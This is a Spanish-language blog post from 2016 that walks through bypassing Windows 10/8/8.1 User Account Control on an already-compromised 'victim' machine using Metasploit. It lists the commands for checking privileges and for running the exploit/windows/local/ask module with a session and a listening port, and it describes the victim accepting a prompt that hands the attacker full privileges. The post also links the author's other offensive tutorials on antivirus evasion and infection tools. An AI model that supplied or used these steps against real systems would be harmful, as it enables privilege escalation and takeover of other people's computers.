sábado, 1 de octubre de 2016

Bypassear privilegios UAC en Windows 10 - 8 - 8.1.



Saludos mis fieles lectores nuevamente eh regresado de un pequeño descanso, como siempre tengo un deuda pendiente con ustedes mis seguidores que siguen a este humilde servidor, hay varias personas que me dejan un mensaje en mi cuenta de facebook diciéndome "Como puedo bypassear el UAC de windows 10, 8, 8.1.

UAC - Es el control de cuentas de usuario, encargado de controlar los privilegios administrativos del sistema.


El exploit ya tiene algo de tiempo liberado, pero hasta el día de hoy sigue siendo utilizado y funciona al 100 %, lo primero que debemos tener es el sistema comprometido en Metasploit Framework


Concretado lo siguiente hemos obtenido la session meterpreter mediante la Post Explotación, si desean aprender a utilizar varias técnicas de este tipo, pueden buscarlo en mi blog.

http://www.backtrack-omar.com/2015/09/2015-flash-0day-exploit-hackingteam.html
http://www.backtrack-omar.com/2015/10/vnc-remote-connection-all-windows.html
http://www.backtrack-omar.com/2015/10/beef-browser-exploitation-framework.html
http://www.backtrack-omar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html
http://www.backtrack-omar.com/2015/10/unicorn-la-herramienta-de-infeccion.html
http://www.backtrack-omar.com/2015/09/explotando-kali-linux-20-cve-2015.html
http://www.backtrack-omar.com/2015/10/evadiendo-av-codificando-payloads-con.html
http://www.backtrack-omar.com/2015/10/winrar-nuestro-viejo-aliado-de.html
http://www.backtrack-omar.com/2015/03/las-viejas-macros-siempre-en-accion.html
http://www.backtrack-omar.com/2014/01/aprendiendo-metasploit-avanzado.html


continuando con el tema, vamos a ver que privilegios tenemos en el sistema comprometido.

getuid - Sirve para ver el tipo de usuario en el que estamos.

Luego ejecutaremos un modulo post para recopilar los privilegios del usuario.

run post/windows/gather/win_privs



como podemos ver, tenemos solo 3 privilegios que ha simple viste se pueden especificar, lo que haremos sera salir de la session utilizando el conocido comando "background"

Ahora añadiremos el Exploit ASK para explotar el filtro del UAC colocando lo siguiente:

--------------------------------------------------------------------------------------------------------------------------
msf exploit(handler) > use exploit/windows/local/ask
msf exploit(ask) > set session 1
msf exploit(ask) > set lport 445
msf exploit(ask) > exploit
--------------------------------------------------------------------------------------------------------------------------

Una ves completado automáticamente hará una conexion inversa con nuestra victima, subiendo un archivo que contendrá el "EXPLOIT", en segundos a la victima les aparecerá una mensaje como el siguiente:


Una ves que la victima aya aceptado automáticamente en Metasploit se abrirá una session.

Ahora vamos a comprobar los permisos que tenemos en el usuario con el modulo:

getuid

run post/windows/gather/win_privs



Como podemos observar tenemos el mismo usuario, pero hemos obtenido todos los privilegios del sistema y podemos modificar o alterar cualquier símbolo del sistema propio  de nuestra victima, espero les aya gustado este POST!


Saludos y éxitos.

0 comentarios:

Publicar un comentario

Datos del Autor


Obra de K. Haring

Hola, mi nombre es omar soy estudiante de Ingenieria de sistemas en Perú. actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.


"Me considero un novato en busca de conocimiento"


Entradas Populares